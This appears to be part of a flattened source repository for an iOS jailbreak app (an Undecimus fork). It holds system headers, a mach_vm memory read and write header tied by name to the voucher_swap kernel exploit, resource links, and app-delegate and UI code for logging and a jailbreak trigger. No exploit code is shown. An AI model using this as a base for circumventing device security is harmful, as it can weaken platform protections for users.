14 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
15 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
16 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
17 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
18 | * Please see the License for the specific language governing rights and
19 | * limitations under the License.
20 | *
21 | * @APPLE_LICENSE_HEADER_END@
22 | */
23 | #ifndef _LIBPROC_H_
24 | #define _LIBPROC_H_
25 |
26 | #include
27 | #include
28 | #include
29 | #include
30 | #include
31 | #include
32 |
33 | #include
34 |
35 | /*
36 | * This header file contains private interfaces to obtain process information.
37 | * These interfaces are subject to change in future releases.
38 | */
39 |
40 | /*!
41 | @define PROC_LISTPIDSPATH_PATH_IS_VOLUME
42 | @discussion This flag indicates that all processes that hold open
43 | file references on the volume associated with the specified
44 | path should be returned.
45 | */
46 | #define PROC_LISTPIDSPATH_PATH_IS_VOLUME 1
47 |
48 |
49 | /*!
50 | @define PROC_LISTPIDSPATH_EXCLUDE_EVTONLY
51 | @discussion This flag indicates that file references that were opened
52 | with the O_EVTONLY flag should be excluded from the matching
53 | criteria.
54 | */
55 | #define PROC_LISTPIDSPATH_EXCLUDE_EVTONLY 2
56 |
57 | __BEGIN_DECLS
58 |
59 | int proc_listpids(uint32_t type, uint32_t typeinfo, void *buffer, int buffersize);
60 |
61 | /*!
62 | @function proc_listpidspath
63 | @discussion A function which will search through the current
64 | processes looking for open file references which match
65 | a specified path or volume.
66 | @param type types of processes to be searched (see proc_listpids)
67 | @param typeinfo adjunct information for type
68 | @param path file or volume path
69 | @param pathflags flags to control which files should be considered
70 | during the process search.
71 | @param buffer a C array of int-sized values to be filled with
72 | process identifiers that hold an open file reference
73 | matching the specified path or volume. Pass NULL to
74 | obtain the minimum buffer size needed to hold the
75 | currently active processes.
76 | @param buffersize the size (in bytes) of the provided buffer.
77 | @result the number of bytes of data returned in the provided buffer;
78 | -1 if an error was encountered;
79 | */
80 | int proc_listpidspath(uint32_t type,
81 | uint32_t typeinfo,
82 | const char *path,
83 | uint32_t pathflags,
84 | void *buffer,
85 | int buffersize);
86 |
87 | int proc_pidinfo(int pid, int flavor, uint64_t arg, void *buffer, int buffersize);
88 | int proc_pidfdinfo(int pid, int fd, int flavor, void * buffer, int buffersize);
89 | int proc_name(int pid, void * buffer, uint32_t buffersize);
90 | int proc_regionfilename(int pid, uint64_t address, void * buffer, uint32_t buffersize);
91 | int proc_kmsgbuf(void * buffer, uint32_t buffersize);
92 | int proc_pidpath(int pid, void * buffer, uint32_t buffersize);
93 | int proc_libversion(int *major, int * minor);
94 |
95 | __END_DECLS
96 |
97 | #endif /*_LIBPROC_H_ */
98 |
--------------------------------------------------------------------------------
/Undecimus/include/mach_vm.h:
--------------------------------------------------------------------------------
1 | /*
2 | * mach_vm.h
3 | * Brandon Azad
4 | */
5 | #ifndef VOUCHER_SWAP__MACH_VM_H_
6 | #define VOUCHER_SWAP__MACH_VM_H_
7 |
8 | #include
9 |
10 | extern
11 | kern_return_t mach_vm_allocate
12 | (
13 | vm_map_t target,
14 | mach_vm_address_t *address,
15 | mach_vm_size_t size,
16 | int flags
17 | );
18 |
19 | extern
20 | kern_return_t mach_vm_deallocate
21 | (
22 | vm_map_t target,
23 | mach_vm_address_t address,
24 | mach_vm_size_t size
25 | );
26 |
27 | extern
28 | kern_return_t mach_vm_write
29 | (
30 | vm_map_t target_task,
31 | mach_vm_address_t address,
32 | vm_offset_t data,
33 | mach_msg_type_number_t dataCnt
34 | );
35 |
36 | extern
37 | kern_return_t mach_vm_read_overwrite
38 | (
39 | vm_map_t target_task,
40 | mach_vm_address_t address,
41 | mach_vm_size_t size,
42 | mach_vm_address_t data,
43 | mach_vm_size_t *outsize
44 | );
45 |
46 | #endif
47 |
--------------------------------------------------------------------------------
/Undecimus/include/reboot.h:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright (c) 2000-2006 Apple Computer, Inc. All rights reserved.
3 | *
4 | * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
5 | *
6 | * This file contains Original Code and/or Modifications of Original Code
7 | * as defined in and that are subject to the Apple Public Source License
8 | * Version 2.0 (the 'License'). You may not use this file except in
9 | * compliance with the License. The rights granted to you under the License
10 | * may not be used to create, or enable the creation or redistribution of,
11 | * unlawful or unlicensed copies of an Apple operating system, or to
12 | * circumvent, violate, or enable the circumvention or violation of, any
13 | * terms of an Apple operating system software license agreement.
14 | *
15 | * Please obtain a copy of the License at
16 | * http://www.opensource.apple.com/apsl/ and read it before using this file.
17 | *
18 | * The Original Code and all software distributed under the License are
19 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
20 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
21 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
22 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
23 | * Please see the License for the specific language governing rights and
24 | * limitations under the License.
25 | *
26 | * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
27 | */
28 | /* Copyright (c) 1995 NeXT Computer, Inc. All Rights Reserved */
29 | /*
30 | * Copyright (c) 1982, 1986, 1988, 1993, 1994
31 | * The Regents of the University of California. All rights reserved.
32 | *
33 | * Redistribution and use in source and binary forms, with or without
34 | * modification, are permitted provided that the following conditions
35 | * are met:
36 | * 1. Redistributions of source code must retain the above copyright
37 | * notice, this list of conditions and the following disclaimer.
38 | * 2. Redistributions in binary form must reproduce the above copyright
39 | * notice, this list of conditions and the following disclaimer in the
40 | * documentation and/or other materials provided with the distribution.
41 | * 3. All advertising materials mentioning features or use of this software
42 | * must display the following acknowledgement:
43 | * This product includes software developed by the University of
44 | * California, Berkeley and its contributors.
45 | * 4. Neither the name of the University nor the names of its contributors
46 | * may be used to endorse or promote products derived from this software
47 | * without specific prior written permission.
48 | *
49 | * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
50 | * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
51 | * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
52 | * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
53 | * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
54 | * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
55 | * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
56 | * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
57 | * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
58 | * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
59 | * SUCH DAMAGE.
60 | *
61 | * @(#)reboot.h 8.3 (Berkeley) 12/13/94
62 | */
63 |
64 | #ifndef _SYS_REBOOT_H_
65 | #define _SYS_REBOOT_H_
66 |
67 | #include
68 | #include
69 | #include
70 |
71 | /*
72 | * Arguments to reboot system call.
73 | */
74 |
75 | #ifdef __APPLE_API_PRIVATE
76 | #define RB_AUTOBOOT 0 /* flags for system auto-booting itself */
77 |
78 | #define RB_ASKNAME 0x01 /* ask for file name to reboot from */
79 | #define RB_SINGLE 0x02 /* reboot to single user only */
80 | #define RB_NOSYNC 0x04 /* dont sync before reboot */
81 | #define RB_HALT 0x08 /* don't reboot, just halt */
82 | #define RB_INITNAME 0x10 /* name given for /etc/init */
83 | #define RB_DFLTROOT 0x20 /* use compiled-in rootdev */
84 | #define RB_ALTBOOT 0x40 /* use /boot.old vs /boot */
85 | #define RB_UNIPROC 0x80 /* don't start slaves */
86 | #define RB_SAFEBOOT 0x100 /* booting safe */
87 | #define RB_UPSDELAY 0x200 /* Delays restart by 5 minutes */
88 | #define RB_QUICK 0x400 /* quick and ungraceful reboot with file system caches flushed*/
89 | #define RB_PANIC 0x800 /* panic the kernel */
90 |
91 | #ifndef KERNEL
92 | __BEGIN_DECLS
93 | /* userspace reboot control */
94 | int usrctl(uint32_t flags);
95 | /* The normal reboot syscall. */
96 | int reboot(int howto);
97 | /* Used with RB_PANIC to panic the kernel from userspace with a message.
98 | * Requires an entitlement on Release. */
99 | int reboot_np(int howto, const char *message);
100 | __END_DECLS
101 | #endif
102 |
103 | #endif /* __APPLE_API_PRIVATE */
104 |
105 | #ifdef __APPLE_API_OBSOLETE
106 | /*
107 | * Constants for converting boot-style device number to type,
108 | * adaptor (uba, mba, etc), unit number and partition number.
109 | * Type (== major device number) is in the low byte
110 | * for backward compatibility. Except for that of the "magic
111 | * number", each mask applies to the shifted value.
112 | * Format:
113 | * (4) (4) (4) (4) (8) (8)
114 | * --------------------------------
115 | * |MA | AD| CT| UN| PART | TYPE |
116 | * --------------------------------
117 | */
118 | #define B_ADAPTORSHIFT 24
119 | #define B_ADAPTORMASK 0x0f
120 | #define B_ADAPTOR(val) (((val) >> B_ADAPTORSHIFT) & B_ADAPTORMASK)
121 | #define B_CONTROLLERSHIFT 20
122 | #define B_CONTROLLERMASK 0xf
123 | #define B_CONTROLLER(val) (((val)>>B_CONTROLLERSHIFT) & B_CONTROLLERMASK)
124 | #define B_UNITSHIFT 16
125 | #define B_UNITMASK 0xff
126 | #define B_UNIT(val) (((val) >> B_UNITSHIFT) & B_UNITMASK)
127 | #define B_PARTITIONSHIFT 8
128 | #define B_PARTITIONMASK 0xff
129 | #define B_PARTITION(val) (((val) >> B_PARTITIONSHIFT) & B_PARTITIONMASK)
130 | #define B_TYPESHIFT 0
131 | #define B_TYPEMASK 0xff
132 | #define B_TYPE(val) (((val) >> B_TYPESHIFT) & B_TYPEMASK)
133 | #define B_MAGICMASK 0xf0000000
134 | #define B_DEVMAGIC 0xa0000000
135 |
136 | #define MAKEBOOTDEV(type, adaptor, controller, unit, partition) \
137 | (((type) << B_TYPESHIFT) | ((adaptor) << B_ADAPTORSHIFT) | \
138 | ((controller) << B_CONTROLLERSHIFT) | ((unit) << B_UNITSHIFT) | \
139 | ((partition) << B_PARTITIONSHIFT) | B_DEVMAGIC)
140 |
141 | #endif /* __APPLE_API_OBSOLETE */
142 |
143 | #endif /* _SYS_REBOOT_H_ */
144 |
--------------------------------------------------------------------------------
/Undecimus/resources/Menlo-Regular.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/resources/Menlo-Regular.ttf
--------------------------------------------------------------------------------
/Undecimus/resources/Painting_With_Chocolate.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/resources/Painting_With_Chocolate.ttf
--------------------------------------------------------------------------------
/Undecimus/resources/binpack64-256.tar.lzma:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/resources/binpack64-256.tar.lzma
--------------------------------------------------------------------------------
/Undecimus/resources/darkmeridian.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/resources/darkmeridian.png
--------------------------------------------------------------------------------
/Undecimus/resources/darkmeridian@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/resources/darkmeridian@2x.png
--------------------------------------------------------------------------------
/Undecimus/resources/darkmeridian@3x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/resources/darkmeridian@3x.png
--------------------------------------------------------------------------------
/Undecimus/resources/lists.tar.lzma:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/resources/lists.tar.lzma
--------------------------------------------------------------------------------
/Undecimus/resources/meridian.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/resources/meridian.png
--------------------------------------------------------------------------------
/Undecimus/resources/meridian@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/resources/meridian@2x.png
--------------------------------------------------------------------------------
/Undecimus/resources/meridian@3x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/resources/meridian@3x.png
--------------------------------------------------------------------------------
/Undecimus/resources/purple.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/resources/purple.png
--------------------------------------------------------------------------------
/Undecimus/resources/purple@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/resources/purple@2x.png
--------------------------------------------------------------------------------
/Undecimus/resources/purple@3x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/resources/purple@3x.png
--------------------------------------------------------------------------------
/Undecimus/resources/white.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/resources/white.png
--------------------------------------------------------------------------------
/Undecimus/resources/white@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/resources/white@2x.png
--------------------------------------------------------------------------------
/Undecimus/resources/white@3x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/resources/white@3x.png
--------------------------------------------------------------------------------
/Undecimus/source/AppDelegate.h:
--------------------------------------------------------------------------------
1 | //
2 | // AppDelegate.h
3 | // Undecimus
4 | //
5 | // Created by pwn20wnd on 8/29/18.
6 | // Copyright © 2018 - 2019 Pwn20wnd. All rights reserved.
7 | //
8 |
9 | #import
10 |
11 | @interface AppDelegate : UIResponder
12 |
13 | @property (strong, nonatomic) UIWindow *window;
14 | @property (strong, atomic) NSPipe *combinedPipe;
15 | @property (assign) int orig_stderr;
16 | @property (assign) int orig_stdout;
17 |
18 | @end
19 |
20 |
--------------------------------------------------------------------------------
/Undecimus/source/AppDelegate.m:
--------------------------------------------------------------------------------
1 | //
2 | // AppDelegate.m
3 | // Undecimus
4 | //
5 | // Created by pwn20wnd on 8/29/18.
6 | // Copyright © 2018 - 2019 Pwn20wnd. All rights reserved.
7 | //
8 |
9 | #include
10 | #import "AppDelegate.h"
11 | #include "JailbreakViewController.h"
12 | #include "SettingsTableViewController.h"
13 | #include "utils.h"
14 | #include "prefs.h"
15 |
16 | @interface AppDelegate ()
17 |
18 | @end
19 |
20 | @implementation AppDelegate
21 |
22 | -(AppDelegate*)init {
23 | self = [super init];
24 | enableLogging();
25 | _combinedPipe = [NSPipe pipe];
26 | _orig_stdout = dup(STDOUT_FILENO);
27 | _orig_stderr = dup(STDERR_FILENO);
28 | dup2(_combinedPipe.fileHandleForWriting.fileDescriptor, STDOUT_FILENO);
29 | dup2(_combinedPipe.fileHandleForWriting.fileDescriptor, STDERR_FILENO);
30 | [self performSelectorInBackground:@selector(handlePipe) withObject:nil];
31 | return self;
32 | }
33 |
34 | -(NSString*)readDataFromFD:(int)infd toFD:(int)outfd {
35 | char s[0x10000];
36 |
37 | ssize_t nread = read(infd, s, sizeof(s));
38 | if (nread <= 0)
39 | return nil;
40 |
41 | write(outfd, s, nread);
42 | if (logfd > 0) {
43 | if (write(logfd, s, nread) != nread) {
44 | write(_orig_stderr, "error writing to logfile\n", 26);
45 | }
46 | }
47 | return [[NSString alloc] initWithBytes:s length:nread encoding:NSUTF8StringEncoding];
48 | }
49 |
50 | - (void)handlePipe {
51 | fd_set fds;
52 | NSMutableString *outline = [NSMutableString new];
53 |
54 | int input_fd = _combinedPipe.fileHandleForReading.fileDescriptor;
55 | int rv;
56 |
57 | do {
58 | FD_ZERO(&fds);
59 | FD_SET(input_fd, &fds);
60 | rv = select(FD_SETSIZE, &fds, NULL, NULL, NULL);
61 | if (FD_ISSET(input_fd, &fds)) {
62 | NSString *read = [self readDataFromFD:input_fd toFD:_orig_stdout];
63 | if (read == nil)
64 | continue;
65 | [outline appendString:read];
66 | NSRange lastNewline = [read rangeOfString:@"\n" options:NSBackwardsSearch];
67 | if (lastNewline.location != NSNotFound) {
68 | lastNewline.location = outline.length - (read.length - lastNewline.location);
69 | NSRange wanted = {0, lastNewline.location + 1};
70 | [JailbreakViewController.sharedController appendTextToOutput:[outline substringWithRange:wanted]];
71 | [outline deleteCharactersInRange:wanted];
72 | }
73 | }
74 | } while (rv > 0);
75 | }
76 |
77 | - (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions {
78 | // Override point for customization after application launch.
79 | [self initPrefs];
80 | [self initShortcuts];
81 | UIApplication.sharedApplication.statusBarHidden = NO;
82 | UIApplication.sharedApplication.idleTimerDisabled = TRUE;
83 | return YES;
84 | }
85 |
86 |
87 | - (void)initPrefs {
88 | register_default_prefs();
89 | repair_prefs();
90 | }
91 |
92 | - (void)initShortcuts {
93 | NSMutableArray *ShortcutItems = [[NSMutableArray alloc] init];
94 | UIApplicationShortcutIcon *JailbreakIcon = [UIApplicationShortcutIcon iconWithTemplateImageName:@"maintenance"];
95 | UIApplicationShortcutItem *JailbreakShortcut = [[UIApplicationShortcutItem alloc] initWithType:@"1" localizedTitle:@"Jailbreak" localizedSubtitle:nil icon:JailbreakIcon userInfo:nil];
96 | [ShortcutItems addObject:JailbreakShortcut];
97 | [[UIApplication sharedApplication] setShortcutItems:ShortcutItems];
98 | }
99 |
100 | - (void)application:(UIApplication *)application performActionForShortcutItem:(UIApplicationShortcutItem *)shortcutItem completionHandler:(void (^)(BOOL))completionHandler {
101 | switch ([[shortcutItem type] integerValue]) {
102 | case 1: {
103 | [[JailbreakViewController sharedController] performSelectorOnMainThread:@selector(tappedOnJailbreak:) withObject:nil waitUntilDone:YES];
104 | break;
105 | }
106 | default:
107 | break;
108 | }
109 | }
110 |
111 | - (BOOL)application:(UIApplication *)app openURL:(NSURL *)url options:(NSDictionary *)options {
112 | if ([[url absoluteString] isEqualToString:@"unc0ver-dark://jailbreak"]) {
113 | [[JailbreakViewController sharedController] performSelectorOnMainThread:@selector(tappedOnJailbreak:) withObject:nil waitUntilDone:YES];
114 | return YES;
115 | }
116 | return NO;
117 | }
118 |
119 | - (void)applicationWillResignActive:(UIApplication *)application {
120 | // Sent when the application is about to move from active to inactive state. This can occur for certain types of temporary interruptions (such as an incoming phone call or SMS message) or when the user quits the application and it begins the transition to the background state.
121 | // Use this method to pause ongoing tasks, disable timers, and invalidate graphics rendering callbacks. Games should use this method to pause the game.
122 | }
123 |
124 |
125 | - (void)applicationDidEnterBackground:(UIApplication *)application {
126 | // Use this method to release shared resources, save user data, invalidate timers, and store enough application state information to restore your application to its current state in case it is terminated later.
127 | // If your application supports background execution, this method is called instead of applicationWillTerminate: when the user quits.
128 | }
129 |
130 |
131 | - (void)applicationWillEnterForeground:(UIApplication *)application {
132 | // Called as part of the transition from the background to the active state; here you can undo many of the changes made on entering the background.
133 | }
134 |
135 |
136 | - (void)applicationDidBecomeActive:(UIApplication *)application {
137 | // Restart any tasks that were paused (or not yet started) while the application was inactive. If the application was previously in the background, optionally refresh the user interface.
138 | }
139 |
140 |
141 | - (void)applicationWillTerminate:(UIApplication *)application {
142 | // Called when the application is about to terminate. Save data if appropriate. See also applicationDidEnterBackground:.
143 | }
144 |
145 |
146 | @end
147 |
--------------------------------------------------------------------------------
/Undecimus/source/ArchiveFile.h:
--------------------------------------------------------------------------------
1 | //
2 | // Archive.h
3 | //
4 | // Created by Sam Bingner on 1/4/19.
5 | // Copyright © 2019 Sam Bingner. All rights reserved.
6 | //
7 |
8 | #ifndef _ARCHIVE_FILE_H
9 | #define _ARCHIVE_FILE_H
10 | #import
11 | #import
12 |
13 | @interface ArchiveFile : NSObject
14 | @property (strong,readonly) NSDictionary *files;
15 |
16 | +(ArchiveFile*)archiveWithFile:(NSString*)filename;
17 | +(ArchiveFile*)archiveWithFd:(int)fd;
18 | -(ArchiveFile*)initWithFile:(NSString*)filename;
19 | -(ArchiveFile*)initWithFd:(int)fd;
20 | -(BOOL)contains:(NSString*)file;
21 | -(NSDictionary *)files;
22 | -(BOOL)extract;
23 | -(BOOL)extractFileNum:(int)fileNum toFd:(int)fd;
24 | -(BOOL)extract:(NSString*)file toPath:(NSString*)path;
25 | -(BOOL)extractWithFlags:(int)flags;
26 | -(BOOL)extractToPath:(NSString*)path;
27 | -(BOOL)extractToPath:(NSString*)path withOwner:(id_t)owner andGroup:(id_t)group;
28 | -(BOOL)extractToPath:(NSString*)path overWriteDirectories:(BOOL)overwrite_dirs;
29 | -(BOOL)extractToPath:(NSString*)path withFlags:(int)flags;
30 | -(BOOL)extractToPath:(NSString*)path withFlags:(int)flags overWriteDirectories:(BOOL)overwrite_dirs;
31 | -(BOOL)extractToPath:(NSString*)path withFlags:(int)flags overWriteDirectories:(BOOL)overwrite_dirs owner:(id_t)owner andGroup:(id_t)group;
32 | @end
33 |
34 | #endif /* _ARCHIVE_FILE_H */
35 |
--------------------------------------------------------------------------------
/Undecimus/source/CreditsTableViewController.h:
--------------------------------------------------------------------------------
1 | //
2 | // CreditsTableViewController.h
3 | // Undecimus
4 | //
5 | // Created by Pwn20wnd on 9/14/18.
6 | // Copyright © 2018 - 2019 Pwn20wnd. All rights reserved.
7 | //
8 |
9 | #import
10 |
11 | @interface CreditsTableViewController : UITableViewController
12 | @property (strong, nonatomic) IBOutlet UITableView *SpecialThanksTableView;
13 |
14 | @property (weak, nonatomic) IBOutlet UIButton *pwn20wndButton;
15 | @property (weak, nonatomic) IBOutlet UIView *pwn20wndContentView;
16 | @property (weak, nonatomic) IBOutlet UIButton *sbingnerButton;
17 | @property (weak, nonatomic) IBOutlet UIView *sbingerContentView;
18 | @property (weak, nonatomic) IBOutlet UIButton *i41nbeerButton;
19 | @property (weak, nonatomic) IBOutlet UIView *i41nbeerContentView;
20 | @property (weak, nonatomic) IBOutlet UIButton *_bazadButton;
21 | @property (weak, nonatomic) IBOutlet UIView *_bazadContentView;
22 | @property (weak, nonatomic) IBOutlet UIButton *MorpheusButton;
23 | @property (weak, nonatomic) IBOutlet UIView *MorpheusContentView;
24 | @property (weak, nonatomic) IBOutlet UIButton *xerubButton;
25 | @property (weak, nonatomic) IBOutlet UIView *xerubContentView;
26 | @property (weak, nonatomic) IBOutlet UIButton *ibsparkesButton;
27 | @property (weak, nonatomic) IBOutlet UIView *ibsparkesContentView;
28 | @property (weak, nonatomic) IBOutlet UIButton *stek29Button;
29 | @property (weak, nonatomic) IBOutlet UIView *stek29ContentView;
30 | @property (weak, nonatomic) IBOutlet UIButton *theninjaprawnButton;
31 | @property (weak, nonatomic) IBOutlet UIView *theninjaprawnContentView;
32 | @property (weak, nonatomic) IBOutlet UIButton *jonathansealsButton;
33 | @property (weak, nonatomic) IBOutlet UIView *JonathansealsContentView;
34 | @property (weak, nonatomic) IBOutlet UIButton *saurikButton;
35 | @property (weak, nonatomic) IBOutlet UIView *saurikContentView;
36 | @property (weak, nonatomic) IBOutlet UIButton *fce365Button;
37 | @property (weak, nonatomic) IBOutlet UIView *fce365ContentView;
38 | @property (weak, nonatomic) IBOutlet UIButton *tihmstarButton;
39 | @property (weak, nonatomic) IBOutlet UIView *tihmstarContentView;
40 | @property (weak, nonatomic) IBOutlet UIButton *s1guzaButton;
41 | @property (weak, nonatomic) IBOutlet UIView *s1guzaContentView;
42 | @property (weak, nonatomic) IBOutlet UIButton *S0rryMyBadButton;
43 | @property (weak, nonatomic) IBOutlet UIView *s0rrymybadContentView;
44 | @property (weak, nonatomic) IBOutlet UIButton *externalistButton;
45 | @property (weak, nonatomic) IBOutlet UIView *externatlistContentView;
46 | @property (weak, nonatomic) IBOutlet UIButton *realbrighiupButton;
47 | @property (weak, nonatomic) IBOutlet UIView *realbrighiuoContentView;
48 | @property (weak, nonatomic) IBOutlet UIButton *nitotvButton;
49 | @property (weak, nonatomic) IBOutlet UIView *nitotvContentView;
50 | @property (weak, nonatomic) IBOutlet UIButton *_matchsticButton;
51 | @property (weak, nonatomic) IBOutlet UIView *matchsticContentView;
52 | @property (weak, nonatomic) IBOutlet UIButton *umanghereButton;
53 | @property (weak, nonatomic) IBOutlet UIView *umanghereContentView;
54 | @property (weak, nonatomic) IBOutlet UIButton *miscmistyButton;
55 | @property (weak, nonatomic) IBOutlet UIView *miscmistyContentView;
56 | @property (weak, nonatomic) IBOutlet UIButton *pimskeksButton;
57 | @property (weak, nonatomic) IBOutlet UIView *pimmskeksContentView;
58 | @property (weak, nonatomic) IBOutlet UIButton *coolstarorgButton;
59 | @property (weak, nonatomic) IBOutlet UIView *coolstarorgContentView;
60 | @property (weak, nonatomic) IBOutlet UIButton *diatrusButton;
61 | @property (weak, nonatomic) IBOutlet UIView *diatrusContentView;
62 | @property (weak, nonatomic) IBOutlet UIButton *HydriButton;
63 | @property (weak, nonatomic) IBOutlet UIView *HydriContentView;
64 | @property (weak, nonatomic) IBOutlet UIButton *c9shadyButton;
65 | @property (weak, nonatomic) IBOutlet UIView *c9shadyContentView;
66 | @property (weak, nonatomic) IBOutlet UIButton *pixelomerButton;
67 | @property (weak, nonatomic) IBOutlet UIView *pixelomerContentView;
68 | @property (weak, nonatomic) IBOutlet UIButton *AaronButton;
69 | @property (weak, nonatomic) IBOutlet UIView *AaronContentView;
70 | @property (weak, nonatomic) IBOutlet UIButton *CarsukiButton;
71 | @property (weak, nonatomic) IBOutlet UIView *CarsukiContentView;
72 | @property (weak, nonatomic) IBOutlet UIButton *libimobiledeviceButton;
73 | @property (weak, nonatomic) IBOutlet UIView *libimobiledeviceContentView;
74 | @property (weak, nonatomic) IBOutlet UIButton *undecimusresourcesButton;
75 | @property (weak, nonatomic) IBOutlet UIView *undecimusresourcesContentView;
76 | @property (weak, nonatomic) IBOutlet UIButton *jakeashacksButton;
77 | @property (weak, nonatomic) IBOutlet UIView *jakeashacksContentView;
78 | @property (weak, nonatomic) IBOutlet UIButton *notcomButton;
79 | @property (weak, nonatomic) IBOutlet UIView *notcomContentView;
80 | @property (weak, nonatomic) IBOutlet UIButton *cryptiiicButton;
81 | @property (weak, nonatomic) IBOutlet UIView *cryptiiicContentView;
82 | @property (weak, nonatomic) IBOutlet UIButton *xerusdesignButton;
83 | @property (weak, nonatomic) IBOutlet UIView *xerusdesignContentView;
84 | @property (weak, nonatomic) IBOutlet UIButton *appledry05Button;
85 | @property (weak, nonatomic) IBOutlet UIView *appledry05ContentView;
86 | @property (weak, nonatomic) IBOutlet UIButton *ayyitzrobButton;
87 | @property (weak, nonatomic) IBOutlet UIView *ayyitzrobContentView;
88 | @property (weak, nonatomic) IBOutlet UIButton *midnightchipButton;
89 | @property (weak, nonatomic) IBOutlet UIView *midnightchipContentView;
90 | @property (weak, nonatomic) IBOutlet UIButton *swag_iosButton;
91 | @property (weak, nonatomic) IBOutlet UIView *swag_iosContentView;
92 | @property (weak, nonatomic) IBOutlet UIButton *jailbreakbusterButton;
93 | @property (weak, nonatomic) IBOutlet UIView
94 | *jailbreakbusterContentView;
95 | @property (weak, nonatomic) IBOutlet UIButton *PatrickButton;
96 | @property (weak, nonatomic) IBOutlet UIView *PatrickContentView;
97 | @property (weak, nonatomic) IBOutlet UIView *SamgContentView;
98 | @property (weak, nonatomic) IBOutlet UIButton *SamgButton;
99 | @property (weak, nonatomic) IBOutlet UIButton *DennisButton;
100 | @property (weak, nonatomic) IBOutlet UIView *DennisContentView;
101 | @property (weak, nonatomic) IBOutlet UIButton *iOSAppDevButton;
102 | @property (weak, nonatomic) IBOutlet UIView *iOSAppDevContentView;
103 | @property (weak, nonatomic) IBOutlet UIButton *UbikButton;
104 | @property (weak, nonatomic) IBOutlet UIView *UbikContentView;
105 | @property (weak, nonatomic) IBOutlet UIButton *benjweaverdevButton;
106 | @property (weak, nonatomic) IBOutlet UIView *benjweaverdevContentView;
107 |
108 | + (NSURL *)getURLForUserName:(NSString *)userName;
109 |
110 | @end
111 |
--------------------------------------------------------------------------------
/Undecimus/source/FakeApt.h:
--------------------------------------------------------------------------------
1 | //
2 | // FakeApt.h
3 | // This is far from a complete implementation
4 | //
5 | // Created by Sam Bingner on 1/24/19.
6 | // Copyright © 2019 Pwn20wnd. All rights reserved.
7 | //
8 |
9 | #ifndef FakeApt_h
10 | #define FakeApt_h
11 |
12 | int versioncomp(NSString *v1, NSString *v2);
13 | NSDictionary *parseDependsOrProvides(NSString *string);
14 | BOOL compareDpkgVersion(NSString *version1, NSString *op, NSString *version2, BOOL *result);
15 | NSString *versionOfPkg(NSString *pkg);
